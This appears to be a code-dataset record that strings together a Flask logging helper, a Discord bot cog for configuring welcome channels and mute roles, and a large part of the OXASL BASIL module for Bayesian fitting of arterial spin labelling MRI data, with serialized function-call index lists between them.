'os.path.join', 'os.path.join', (['docs_path', '"""_build"""'], {}), "(docs_path, '_build')\n", (4752, 4773), False, 'import os\n'), ((1905, 1941), 'setuptools.command.test.test.initialize_options', 'TestCommand.initialize_options', (['self'], {}), '(self)\n', (1935, 1941), True, 'from setuptools.command.test import test as TestCommand\n'), ((2012, 2046), 'setuptools.command.test.test.finalize_options', 'TestCommand.finalize_options', (['self'], {}), '(self)\n', (2040, 2046), True, 'from setuptools.command.test import test as TestCommand\n'), ((2350, 2365), 'sys.exit', 'sys.exit', (['errno'], {}), '(errno)\n', (2358, 2365), False, 'import sys\n'), ((3967, 3991), 'six.add_metaclass', 'add_metaclass', (['ObjKeeper'], {}), '(ObjKeeper)\n', (3980, 3991), False, 'from six import add_metaclass\n'), ((573, 595), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (593, 595), False, 'import inspect\n'), ((6090, 6144), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'exclude': "['tests', 'tests.*']"}), "(exclude=['tests', 'tests.*'])\n", (6114, 6144), False, 'import setuptools\n'), ((3305, 3323), 'sphinx.setup_command.BuildDoc.run', 'BuildDoc.run', (['self'], {}), '(self)\n', (3317, 3323), False, 'from sphinx.setup_command import BuildDoc\n'), ((3387, 3402), 'sys.exit', 'sys.exit', (['errno'], {}), '(errno)\n', (3395, 3402), False, 'import sys\n'), ((3437, 3455), 'sphinx.setup_command.BuildDoc.run', 'BuildDoc.run', (['self'], {}), '(self)\n', (3449, 3455), False, 'from sphinx.setup_command import BuildDoc\n'), ((4165, 4197), 'os.path.join', 'os.path.join', (['__location__', 'path'], {}), '(__location__, path)\n', (4177, 4197), False, 'import os\n'), ((4303, 4336), 'os.path.join', 'os.path.join', (['__location__', 'fname'], {}), '(__location__, fname)\n', (4315, 4336), False, 'import os\n'), ((2278, 2304), 'shlex.split', 'shlex.split', (['self.tox_args'], {}), '(self.tox_args)\n', (2289, 2304), False, 'import shlex\n')]
|
# coding: utf-8
import logging
import sys
from flask.logging import default_handler
default_formatter = '%(asctime)s %(process)d,%(threadName)s %(filename)s:%(lineno)d [%(levelname)s] %(message)s'
def configure_logging(app):
# handler = None
if app.debug:
handler = logging.StreamHandler(sys.stdout)
else:
filename = app.config['LOGFILE']
handler = logging.handlers.TimedRotatingFileHandler(filename, when='D')
handler.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter(default_formatter))
app.logger.addHandler(handler)
app.logger.removeHandler(default_handler)
|
[
"logging.Formatter",
"logging.StreamHandler",
"logging.handlers.TimedRotatingFileHandler"
] |
[((286, 319), 'logging.StreamHandler', 'logging.StreamHandler', (['sys.stdout'], {}), '(sys.stdout)\n', (307, 319), False, 'import logging\n'), ((389, 450), 'logging.handlers.TimedRotatingFileHandler', 'logging.handlers.TimedRotatingFileHandler', (['filename'], {'when': '"""D"""'}), "(filename, when='D')\n", (430, 450), False, 'import logging\n'), ((512, 548), 'logging.Formatter', 'logging.Formatter', (['default_formatter'], {}), '(default_formatter)\n', (529, 548), False, 'import logging\n')]
|
import json
from discord.ext import commands
import discord
import os
with open('config.json') as configFile:
configs = json.load(configFile)
prefix = configs.get('prefix_list')[0]
class Setup(commands.Cog, description='Used to set up the bot for welcome messages, mute/unmute etc.'):
def __init__(self, bot):
self.bot = bot
@commands.command(name='setup', description='Used to set the bot up, for welcome messages, mute roles, etc.\n'
'Recommended to set the bot up as early as possible when it joins a '
'server.')
@commands.guild_only()
async def setup_welcome(self, ctx):
embed = discord.Embed(title='You can setup preferences for your server with these commands.',
timestamp=ctx.message.created_at,
color=discord.Color.random())
embed.add_field(name='Set channel for welcome messages',
value=f'`{prefix}setwelcomechannel [channel]`\nExample: `{prefix}setwelcomechannel #welcome`\n'
f'__**What you\'d see:**__\n'
f'{ctx.author.mention} has joined **{ctx.guild.name}**! Say hi!\n'
f'{ctx.author.mention} has left **{ctx.guild.name}**. Until Next time!',
inline=False)
embed.add_field(name='Set default reason when kicking/banning members',
value=f'`{prefix}setkickreason [reason]`\nExample: `{prefix}setkickreason Being a jerk`\n'
f'__**What the kicked member would see**__:\n'
f'You have been kicked from **{ctx.guild.name}** for **Being a jerk**.',
inline=False)
embed.add_field(name='Set the mute role for this server',
value=f'`{prefix}setmuterole [role]`\nExample: `{prefix}setmuterole muted` '
f'(muted must be an actual role).\n'
f'You can create a mute role by `{prefix}createmuterole [role name]`',
inline=False)
embed.add_field(name='Set the default Member role for this server',
value=f'`{prefix}setmemberrole [role]`\nExample: `{prefix}setmemberrole Member`'
f' (Member must be an actual role).',
inline=False)
embed.set_footer(text=f'Command requested by {ctx.author.name}')
await ctx.send(embed=embed)
@commands.command(name='setwelcomechannel', description="Used to set the channel welcome messages arrive. "
"See description of the `setup` command for more info.")
@commands.has_permissions(administrator=True)
@commands.guild_only()
async def set_welcome_channel(self, ctx, channel: discord.TextChannel):
channel_id = channel.id
if not os.path.exists(f'./configs/guild{ctx.guild.id}.json'):
with open(f'./configs/guild{ctx.guild.id}.json', 'w') as jsonFile:
json.dump({}, jsonFile)
with open(f'./configs/guild{ctx.guild.id}.json', 'r') as jsonFile:
data = json.load(jsonFile)
data['welcome_channel'] = channel_id
with open(f'./configs/guild{ctx.guild.id}.json', 'w') as jsonFile:
json.dump(data, jsonFile)
await ctx.send(f'Welcome channel set to {channel.mention} successfully.')
@commands.command(name='setkickreason', description='Used to set the default kick/ban reason '
'in a case where no reason is given.\n'
'Check the description of the `setup` command '
'for more information.')
@commands.has_permissions(administrator=True)
@commands.guild_only()
async def set_kick_reason(self, ctx, *, reason):
if not os.path.exists(f'./configs/guild{ctx.guild.id}.json'):
with open(f'./configs/guild{ctx.guild.id}.json', 'w') as jsonFile:
json.dump({}, jsonFile)
with open(f'./configs/guild{ctx.guild.id}.json', 'r') as jsonFile:
data = json.load(jsonFile)
data['default_kick_ban_reason'] = str(reason)
with open(f'./configs/guild{ctx.guild.id}.json', 'w') as jsonFile:
json.dump(data, jsonFile)
await ctx.send(f'Default kick/ban reason set to **{reason}** successfully.')
@commands.command(name='setmemberrole', description='Used to set the role which is given to every member upon '
'joining. '
'Check description of `setup` command for more info.')
@commands.has_permissions(administrator=True)
@commands.guild_only()
async def set_member_role(self, ctx, role: discord.Role):
if not os.path.exists(f'./configs/guild{ctx.guild.id}.json'):
with open(f'./configs/guild{ctx.guild.id}.json', 'w') as jsonFile:
json.dump({}, jsonFile)
with open(f'./configs/guild{ctx.guild.id}.json', 'r') as jsonFile:
data = json.load(jsonFile)
data['member_role'] = role.id
with open(f'./configs/guild{ctx.guild.id}.json', 'w') as jsonFile:
json.dump(data, jsonFile)
await ctx.send(f'Member role set to **{role.name}** successfully.')
@commands.command(name='setmuterole', description='Sets the role assigned to muted people. '
'Use `createmuterole` for creating a muted role and '
'automatically setting permissions to every channel.')
@commands.has_permissions(administrator=True)
@commands.guild_only()
async def set_mute_role(self, ctx, role: discord.Role):
if not os.path.exists(f'./configs/guild{ctx.guild.id}.json'):
with open(f'./configs/guild{ctx.guild.id}.json', 'w') as jsonFile:
json.dump({}, jsonFile)
with open(f'./configs/guild{ctx.guild.id}.json', 'r') as jsonFile:
data = json.load(jsonFile)
data['mute_role'] = role.id
with open(f'./configs/guild{ctx.guild.id}.json', 'w') as jsonFile:
json.dump(data, jsonFile)
await ctx.send(f'Mute role set to **{role.name}** successfully.')
@commands.command(name='createmuterole', description='Creates a mute role, and sets messaging permissions to '
'every channel.\n '
'the `rolename` argument is optional. (Defaults to "Muted")')
@commands.has_permissions(manage_roles=True)
@commands.guild_only()
async def create_mute_role(self, ctx, rolename=None):
if rolename is None:
rolename = 'Muted'
guild = ctx.guild
mutedRole = await guild.create_role(name=rolename) # creating the role
for channel in guild.channels:
await channel.set_permissions(mutedRole, speak=False, send_messages=False, use_slash_commands=False)
# setting permissions for each channel
await ctx.send(f'Created role **{mutedRole}** and set permissions accordingly.')
await Setup.set_mute_role(self, ctx, mutedRole)
def setup(bot):
bot.add_cog(Setup(bot))
|
[
"json.dump",
"json.load",
"discord.ext.commands.command",
"discord.ext.commands.has_permissions",
"discord.Color.random",
"os.path.exists",
"discord.ext.commands.guild_only"
] |
[((127, 148), 'json.load', 'json.load', (['configFile'], {}), '(configFile)\n', (136, 148), False, 'import json\n'), ((356, 553), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setup"""', 'description': '"""Used to set the bot up, for welcome messages, mute roles, etc.\nRecommended to set the bot up as early as possible when it joins a server."""'}), '(name=\'setup\', description=\n """Used to set the bot up, for welcome messages, mute roles, etc.\nRecommended to set the bot up as early as possible when it joins a server."""\n )\n', (372, 553), False, 'from discord.ext import commands\n'), ((648, 669), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (667, 669), False, 'from discord.ext import commands\n'), ((2612, 2782), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setwelcomechannel"""', 'description': '"""Used to set the channel welcome messages arrive. See description of the `setup` command for more info."""'}), "(name='setwelcomechannel', description=\n 'Used to set the channel welcome messages arrive. See description of the `setup` command for more info.'\n )\n", (2628, 2782), False, 'from discord.ext import commands\n'), ((2841, 2885), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'administrator': '(True)'}), '(administrator=True)\n', (2865, 2885), False, 'from discord.ext import commands\n'), ((2891, 2912), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (2910, 2912), False, 'from discord.ext import commands\n'), ((3574, 3784), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setkickreason"""', 'description': '"""Used to set the default kick/ban reason in a case where no reason is given.\nCheck the description of the `setup` command for more information."""'}), '(name=\'setkickreason\', description=\n """Used to set the default kick/ban reason in a case where no reason is given.\nCheck the description of the `setup` command for more information."""\n )\n', (3590, 3784), False, 'from discord.ext import commands\n'), ((3954, 3998), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'administrator': '(True)'}), '(administrator=True)\n', (3978, 3998), False, 'from discord.ext import commands\n'), ((4004, 4025), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (4023, 4025), False, 'from discord.ext import commands\n'), ((4644, 4825), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setmemberrole"""', 'description': '"""Used to set the role which is given to every member upon joining. Check description of `setup` command for more info."""'}), "(name='setmemberrole', description=\n 'Used to set the role which is given to every member upon joining. Check description of `setup` command for more info.'\n )\n", (4660, 4825), False, 'from discord.ext import commands\n'), ((4939, 4983), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'administrator': '(True)'}), '(administrator=True)\n', (4963, 4983), False, 'from discord.ext import commands\n'), ((4989, 5010), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (5008, 5010), False, 'from discord.ext import commands\n'), ((5613, 5817), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setmuterole"""', 'description': '"""Sets the role assigned to muted people. Use `createmuterole` for creating a muted role and automatically setting permissions to every channel."""'}), "(name='setmuterole', description=\n 'Sets the role assigned to muted people. Use `createmuterole` for creating a muted role and automatically setting permissions to every channel.'\n )\n", (5629, 5817), False, 'from discord.ext import commands\n'), ((5927, 5971), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'administrator': '(True)'}), '(administrator=True)\n', (5951, 5971), False, 'from discord.ext import commands\n'), ((5977, 5998), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (5996, 5998), False, 'from discord.ext import commands\n'), ((6595, 6793), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""createmuterole"""', 'description': '"""Creates a mute role, and sets messaging permissions to every channel.\n the `rolename` argument is optional. (Defaults to "Muted")"""'}), '(name=\'createmuterole\', description=\n """Creates a mute role, and sets messaging permissions to every channel.\n the `rolename` argument is optional. (Defaults to "Muted")"""\n )\n', (6611, 6793), False, 'from discord.ext import commands\n'), ((6906, 6949), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (6930, 6949), False, 'from discord.ext import commands\n'), ((6955, 6976), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (6974, 6976), False, 'from discord.ext import commands\n'), ((3036, 3089), 'os.path.exists', 'os.path.exists', (['f"""./configs/guild{ctx.guild.id}.json"""'], {}), "(f'./configs/guild{ctx.guild.id}.json')\n", (3050, 3089), False, 'import os\n'), ((3305, 3324), 'json.load', 'json.load', (['jsonFile'], {}), '(jsonFile)\n', (3314, 3324), False, 'import json\n'), ((3459, 3484), 'json.dump', 'json.dump', (['data', 'jsonFile'], {}), '(data, jsonFile)\n', (3468, 3484), False, 'import json\n'), ((4094, 4147), 'os.path.exists', 'os.path.exists', (['f"""./configs/guild{ctx.guild.id}.json"""'], {}), "(f'./configs/guild{ctx.guild.id}.json')\n", (4108, 4147), False, 'import os\n'), ((4363, 4382), 'json.load', 'json.load', (['jsonFile'], {}), '(jsonFile)\n', (4372, 4382), False, 'import json\n'), ((4526, 4551), 'json.dump', 'json.dump', (['data', 'jsonFile'], {}), '(data, jsonFile)\n', (4535, 4551), False, 'import json\n'), ((5088, 5141), 'os.path.exists', 'os.path.exists', (['f"""./configs/guild{ctx.guild.id}.json"""'], {}), "(f'./configs/guild{ctx.guild.id}.json')\n", (5102, 5141), False, 'import os\n'), ((5357, 5376), 'json.load', 'json.load', (['jsonFile'], {}), '(jsonFile)\n', (5366, 5376), False, 'import json\n'), ((5504, 5529), 'json.dump', 'json.dump', (['data', 'jsonFile'], {}), '(data, jsonFile)\n', (5513, 5529), False, 'import json\n'), ((6074, 6127), 'os.path.exists', 'os.path.exists', (['f"""./configs/guild{ctx.guild.id}.json"""'], {}), "(f'./configs/guild{ctx.guild.id}.json')\n", (6088, 6127), False, 'import os\n'), ((6343, 6362), 'json.load', 'json.load', (['jsonFile'], {}), '(jsonFile)\n', (6352, 6362), False, 'import json\n'), ((6488, 6513), 'json.dump', 'json.dump', (['data', 'jsonFile'], {}), '(data, jsonFile)\n', (6497, 6513), False, 'import json\n'), ((912, 934), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (932, 934), False, 'import discord\n'), ((3186, 3209), 'json.dump', 'json.dump', (['{}', 'jsonFile'], {}), '({}, jsonFile)\n', (3195, 3209), False, 'import json\n'), ((4244, 4267), 'json.dump', 'json.dump', (['{}', 'jsonFile'], {}), '({}, jsonFile)\n', (4253, 4267), False, 'import json\n'), ((5238, 5261), 'json.dump', 'json.dump', (['{}', 'jsonFile'], {}), '({}, jsonFile)\n', (5247, 5261), False, 'import json\n'), ((6224, 6247), 'json.dump', 'json.dump', (['{}', 'jsonFile'], {}), '({}, jsonFile)\n', (6233, 6247), False, 'import json\n')]
|
#!/usr/bin/env python
"""
OXASL - Bayesian model fitting for ASL
The BASIL module is a little more complex than the other Workspace based
modules because of the number of options available and the need for flexibility
in how the modelling steps are run.
The main function is ``basil`` which performs model fitting on ASL data
in the Workspace ``asldata`` attribute.
wsp = Workspace()
wsp.asldata = AslImage("asldata.nii.gz", tis=[1.6,])
wsp.infertiss = True
basil(wsp.sub("basil"))
basil.finalstep.mean_ftiss.save("mean_ftiss.nii.gz")
Because of the number of options possible for the modelling process, the
workspace attribute ``basil_options`` can be set as a dictionary of extra
options relevant only to Basil:
wsp = Workspace()
wsp.asldata = AslImage("asldata.nii.gz", tis=[1.6,])
wsp.basil_options = {"infertiss" : True, "spatial" : True}
basil(wsp.sub("basil"))
basil.finalstep.mean_ftiss.save("mean_ftiss.nii.gz")
All options specified in basil_options are either consumed by Basil, or
if not passed directly to the model.
Copyright (c) 2008-2020 Univerisity of Oxford
"""
import sys
import math
import numpy as np
import scipy.ndimage
from fsl.wrappers import LOAD
from fsl.data.image import Image
from oxasl import __version__, __timestamp__, AslImage, Workspace, image, reg
from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions
def basil(wsp, prefit=True, **kwargs):
"""
For oxasl_deblur compatibility
"""
run(wsp, prefit, **kwargs)
def run(wsp, prefit=True, **kwargs):
"""
Run BASIL modelling on ASL data in a workspace
:param wsp: Workspace object
:param prefit: If True, run a pre-fitting step using the mean over repeats of the ASL data
Required workspace attributes
-----------------------------
- ``asldata`` : AslImage object
Optional workspace attributes
-----------------------------
- ``mask`` : Brain mask (fsl.Image)
- ``wp`` : If True, use 'white paper' mode (Alsop et al) - modifies some defaults and infers tissue component only
- ``infertiss`` : If True, infer tissue component (default: True)
- ``inferbat`` : If True, infer bolus arrival time (default: False)
- ``infertau`` : If True, infer bolus duration (default: False)
- ``inferart`` : If True, infer arterial component (default: False)
- ``infert1`` : If True, infer T1 (default: False)
- ``inferpc`` : If True, infer PC (default: False)
- ``t1``: Assumed/initial estimate for tissue T1 (default: 1.65 in white paper mode, 1.3 otherwise)
- ``t1b``: Assumed/initial estimate for blood T1 (default: 1.65)
- ``bat``: Assumed/initial estimate for bolus arrival time (s) (default 0 in white paper mode, 1.3 for CASL, 0.7 otherwise)
- ``t1im`` : T1 map as Image
- ``pgm`` : Grey matter partial volume map as Image
- ``pwm`` : White matter partial volume map as Image
- ``initmvn`` : MVN structure to use as initialization as Image
- ``spatial`` : If True, include final spatial VB step (default: False)
- ``onestep`` : If True, do all inference in a single step (default: False)
- ``basil_options`` : Optional dictionary of additional options for underlying model
"""
wsp.log.write("\nRunning BASIL Bayesian modelling on ASL data in '%s' data space\n" % wsp.ifnone("image_space", "native"))
# Single or Multi TI setup
if wsp.asldata.ntis == 1:
# Single TI data - don't try to infer arterial component of bolus duration, we don't have enough info
wsp.log.write(" - Operating in Single TI mode - no arterial component, fixed bolus duration\n")
wsp.inferart = False
wsp.infertau = False
batsd_default = 0.1
else:
# For multi TI/PLD data, set a more liberal prior for tissue ATT since we should be able to
# determine this from the data. NB this leaves the arterial BAT alone.
batsd_default = 1
if wsp.wp:
# White paper mode - this overrides defaults, but can be overwritten by command line
# specification of individual parameters
wsp.log.write(" - Analysis in white paper mode: T1 default=1.65, BAT default=0, voxelwise calibration\n")
t1_default = 1.65
bat_default = 0.0
else:
t1_default = 1.3
if wsp.asldata.casl:
bat_default = 1.3
else:
bat_default = 0.7
if wsp.t1 is None:
wsp.t1 = t1_default
if wsp.t1b is None:
wsp.t1b = 1.65
if wsp.bat is None:
wsp.bat = bat_default
if wsp.batsd is None:
wsp.batsd = batsd_default
if wsp.infertiss is None:
wsp.infertiss = True
# if we are doing CASL then fix the bolus duration, unless explicitly told us otherwise
if wsp.infertau is None:
wsp.infertau = not wsp.asldata.casl
# Pick up extra BASIL options
wsp.basil_options = dict(wsp.ifnone("basil_options", {}))
mask_policy = wsp.ifnone("basil_mask", "default")
if mask_policy in ("default", "dilated"):
wsp.log.write(" - Using pipeline analysis mask\n")
# Two possible locations for compatibility
if wsp.rois is not None and wsp.rois.mask is not None:
mask = wsp.rois.mask
else:
mask = wsp.mask
if mask_policy == "dilated":
# Use 3x3x3 kernel for compatibility with fslmaths default
wsp.log.write(" - Dilating mask for Basil analysis\n")
struct = scipy.ndimage.generate_binary_structure(3, 3)
mask = Image(scipy.ndimage.binary_dilation(mask.data, structure=struct).astype(np.int), header=mask.header)
elif mask_policy == "none":
wsp.log.write(" - Not using mask for Basil - will fit every voxel\n")
mask = Image(np.ones(wsp.asldata.data.shape[:3]), header=wsp.asldata.header)
else:
raise ValueError("Unrecognized mask policy: %s" % mask_policy)
# If we only have one volume, set a nominal noise prior as it is not possible to
# estimate from the data
if wsp.asldata.nvols / wsp.asldata.ntc == 1:
wsp.log.write(" - Restricting noise prior as only one ASL volume\n")
wsp.basil_options["prior-noise-stddev"] = 1.0
if prefit and max(wsp.asldata.rpts) > 1:
# Initial BASIL run on mean data
wsp.log.write(" - Doing initial fit on mean at each TI\n\n")
init_wsp = wsp.sub("init")
main_wsp = wsp.sub("main")
basil_fit(init_wsp, wsp.asldata.mean_across_repeats(), mask=mask)
wsp.basil_options["continue-from-mvn"] = wsp.init.finalstep.finalMVN
main_wsp.initmvn = wsp.basil_options["continue-from-mvn"]
else:
main_wsp = wsp
# Main run on full ASL data
wsp.log.write("\n - Doing fit on full ASL data\n\n")
basil_fit(main_wsp, wsp.asldata, mask=mask)
wsp.finalstep = main_wsp.finalstep
def basil_fit(wsp, asldata, mask=None):
"""
Run Bayesian model fitting on ASL data
See ``basil`` for details of workspace attributes used
:param wsp: Workspace object
:param asldata: AslImage object to use as input data
"""
if len(asldata.tes) > 1:
steps = basil_steps_multite(wsp, asldata, mask)
else:
steps = basil_steps(wsp, asldata, mask)
prev_result = None
wsp.asldata_diff = asldata.diff().reorder("rt")
wsp.basil_mask = mask
for idx, step in enumerate(steps):
step_wsp = wsp.sub("step%i" % (idx+1))
desc = "Step %i of %i: %s" % (idx+1, len(steps), step.desc)
if prev_result is not None:
desc += " - Initialise with step %i" % idx
step_wsp.log.write(desc + " ")
result = step.run(prev_result, log=wsp.log, fsllog=wsp.fsllog,
fabber_corelib=wsp.fabber_corelib, fabber_libs=wsp.fabber_libs,
fabber_coreexe=wsp.fabber_coreexe, fabber_exes=wsp.fabber_exes)
for key, value in result.items():
if key == "modelfit":
# Treat model fit specially - make it an AslImage and also output a mean
# across repeats version for comparison
value = wsp.asldata_diff.derived(value.data, header=value.header)
modelfit_mean = value.mean_across_repeats()
setattr(step_wsp, "modelfit_mean", modelfit_mean)
setattr(step_wsp, key, value)
if step_wsp.logfile is not None and step_wsp.savedir is not None:
step_wsp.set_item("logfile", step_wsp.logfile, save_fn=str)
prev_result = result
wsp.finalstep = step_wsp
wsp.log.write("\nEnd\n")
def _calc_slicedt(wsp, options):
"""
Calculate the slicedt for basil given that we may be quantifying in
a space other than the usual ASL space
We do this by generating a slice time offset image and transforming it
to quantification space. Since this could be rotated wrt to the asl data
we may need to warn if the resulting image has significant slice time variation
across X or Y axes
"""
img_space = wsp.ifnone("image_space", "native")
if img_space != "native":
asldata = options["data"]
_x, _y, z, _t = np.indices(list(asldata.data.shape[:3]) + [asldata.ntis,])
print(z.shape)
tis_arr = np.array(asldata.tis) + (z.astype(np.float32) * options["slicedt"])
print(tis_arr.shape)
tis_img = Image(tis_arr, header=options["data"].header)
wsp.tiimg = reg.change_space(wsp, tis_img, wsp.ifnone("image_space", "native"))
#print(ztrans.data)
print(wsp.tiimg.data.shape)
del options["slicedt"]
ti_idx = 1
while "ti%i" % ti_idx in options:
del options["ti%i" % ti_idx]
ti_idx += 1
options["tiimg"] = wsp.tiimg
def basil_steps(wsp, asldata, mask=None):
"""
Get the steps required for a BASIL run
This is separated for the case where an alternative process wants to run
the actual modelling, or so that the steps can be checked prior to doing
an actual run.
Arguments are the same as the ``basil`` function. No workspace is required.
"""
if asldata is None:
raise ValueError("Input ASL data is None")
wsp.log.write("BASIL v%s\n" % __version__)
asldata.summary(log=wsp.log)
asldata = asldata.diff().reorder("rt")
# Default Fabber options for VB runs and spatial steps. Note that attributes
# which are None (e.g. sliceband) are not passed to Fabber
options = {
"data" : asldata,
"model" : "aslrest",
"disp" : "none",
"exch" : "mix",
"method" : "vb",
"noise" : "white",
"allow-bad-voxels" : True,
"max-iterations" : 20,
"convergence" : "trialmode",
"max-trials" : 10,
"save-mean" : True,
"save-mvn" : True,
"save-std" : True,
"save-model-fit" : True,
"save-residuals" : wsp.ifnone("output_residuals", False),
}
if mask is not None:
options["mask"] = mask
# We choose to pass TIs (not PLDs). The asldata object ensures that
# TIs are correctly derived from PLDs, when these are specified, by adding
# the bolus duration.
for idx, ti in enumerate(asldata.tis):
options["ti%i" % (idx+1)] = ti
options["rpt%i" % (idx+1)] = asldata.rpts[idx]
# Bolus duration - use a single value where possible as cannot infer otherwise
taus = getattr(asldata, "taus", [1.8,])
if min(taus) == max(taus):
options["tau"] = taus[0]
else:
for idx, tau in enumerate(taus):
options["tau%i" % (idx+1)] = tau
# Other asl data parameters
for attr in ("casl", "slicedt", "sliceband"):
if getattr(asldata, attr, None) is not None:
options[attr] = getattr(asldata, attr)
_calc_slicedt(wsp, options)
if wsp.noiseprior:
# Use an informative noise prior
if wsp.noisesd is None:
snr = wsp.ifnone("snr", 10)
wsp.log.write(" - Using SNR of %f to set noise std dev\n" % snr)
# Estimate signal magntiude FIXME diffdata_mean is always 3D?
if wsp.diffdata_mean.ndim > 3:
datamax = np.amax(wsp.diffdata_mean.data, 3)
else:
datamax = wsp.diffdata_mean.data
brain_mag = np.mean(datamax.data[mask.data != 0])
# this will correspond to whole brain CBF (roughly) - about 0.5 of GM
noisesd = math.sqrt(brain_mag * 2 / snr)
else:
noisesd = wsp.noisesd
wsp.log.write(" - Using a prior noise sd of: %f\n" % noisesd)
options["prior-noise-stddev"] = noisesd
# Add Basil-specific options defined on the workspace
options.update(wsp.ifnone("basil_options", {}))
# Additional optional workspace arguments
for attr in ("t1", "t1b", "bat", "FA", "pwm", "pgm", "batsd"):
value = getattr(wsp, attr)
if value is not None:
options[attr] = value
# Options for final spatial step
prior_type_spatial = "M"
prior_type_mvs = "A"
options_svb = {
"method" : "spatialvb",
"param-spatial-priors" : "N+",
"convergence" : "maxits",
"max-iterations": 20,
}
wsp.log.write("Model (in fabber) is : %s\n" % options["model"])
wsp.log.write("Dispersion model option is %s\n" % options["disp"])
wsp.log.write("Compartment exchange model option is %s\n" % options["exch"])
inferdisp = options["disp"] != "none"
inferexch = options["exch"] != "mix"
# Partial volume correction
pvcorr = "pgm" in options or "pwm" in options
if pvcorr:
if not wsp.infertiss:
raise ValueError("ERROR: PV correction is not compatible with --artonly option (there is no tissue component)")
options["incpve"] = True
if "pgm" not in options or "pwm" not in options:
raise ValueError("Only one partial volume map (GM / WM) was supplied for PV correctioN")
# Need a spatial step with more iterations for the PV correction
wsp.spatial = True
options_svb["max-iterations"] = 200
# Ignore partial volumes below 0.1
pgm_img = options.pop("pgm")
pwm_img = options.pop("pwm")
pgm = np.copy(pgm_img.data)
pwm = np.copy(pwm_img.data)
pgm[pgm < 0.1] = 0
pgm[pgm > 1] = 1
pwm[pwm < 0.1] = 0
pwm[pwm > 1] = 1
pgm = Image(pgm, header=pgm_img.header)
pwm = Image(pwm, header=pwm_img.header)
# Set general parameter inference and inclusion
if wsp.infertiss:
options["inctiss"] = True
if wsp.inferbat:
options["incbat"] = True
options["inferbat"] = True # Infer in first step
if wsp.inferart:
options["incart"] = True
if wsp.inferpc:
options["incpc"] = True
if wsp.infertau:
options["inctau"] = True
if wsp.infert1:
options["inct1"] = True
# Keep track of the number of spatial priors specified by name
spriors = 1
if wsp.initmvn:
# we are being supplied with an initial MVN
wsp.log.write("Initial MVN being loaded %s\n" % wsp.initmvn.name)
options["continue-from-mvn"] = wsp.initmvn
# T1 image prior
if wsp.t1im is not None:
spriors = _add_prior(options, spriors, "T_1", type="I", image=wsp.t1im)
# BAT image prior
if wsp.batim is not None:
# With a BAT image prior we must include BAT even if we are not inferring it
# (in this case the image prior will be treated as ground truth)
spriors = _add_prior(options, spriors, "delttiss", type="I", image=wsp.batim)
options["incbat"] = True
steps = []
components = ""
### --- TISSUE MODULE ---
if wsp.infertiss:
components += " Tissue "
options["infertiss"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
# setup spatial priors ready
spriors = _add_prior(options_svb, spriors, "ftiss", type=prior_type_spatial)
### --- ARTERIAL MODULE ---
if wsp.inferart:
components += " Arterial "
options["inferart"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
# setup spatial priors ready
spriors = _add_prior(options_svb, spriors, "fblood", type=prior_type_mvs)
### --- BOLUS DURATION MODULE ---
if wsp.infertau:
components += " Bolus duration "
options["infertau"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- MODEL EXTENSIONS MODULE ---
# Add variable dispersion and/or exchange parameters and/or pre-capiliary
if inferdisp or inferexch or wsp.inferpc:
if inferdisp:
components += " dispersion"
options["inferdisp"] = True
if inferexch:
components += " exchange"
options["inferexch"] = True
if wsp.inferpc:
components += " pre-capiliary"
options["inferpc"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- T1 MODULE ---
if wsp.infert1:
components += " T1 "
options["infert1"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- PV CORRECTION MODULE ---
if pvcorr:
# setup ready for PV correction, which has to be done with spatial priors
components += " PVE"
options["pvcorr"] = True
# set the image priors for the PV maps
spriors = _add_prior(options, spriors, "pvgm", type="I", image=pgm)
spriors = _add_prior(options, spriors, "pvwm", type="I", image=pwm)
spriors = _add_prior(options, spriors, "fwm", type="M")
if steps:
# Add initialisaiton step for PV correction - ONLY if we have something to init from
steps.append(PvcInitStep(wsp, {"data" : asldata, "mask" : mask, "pgm" : pgm, "pwm" : pwm}, "PVC initialisation"))
### --- SPATIAL MODULE ---
if wsp.spatial:
step_desc = "Spatial VB - %s" % components
options.update(options_svb)
del options["max-trials"]
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- SINGLE-STEP OPTION ---
if wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
if not steps:
raise ValueError("No steps were generated - no parameters were set to be inferred")
return steps
def basil_steps_multite(wsp, asldata, mask=None, **kwargs):
"""
Get the steps required for a BASIL run on multi-TE data
This is separated for the case where an alternative process wants to run
the actual modelling, or so that the steps can be checked prior to doing
an actual run.
Arguments are the same as the ``basil`` function.
"""
if asldata is None:
raise ValueError("Input ASL data is None")
wsp.log.write("BASIL v%s\n" % __version__)
asldata.summary(log=wsp.log)
asldata = asldata.diff().reorder("rt")
# Default Fabber options for VB runs and spatial steps. Note that attributes
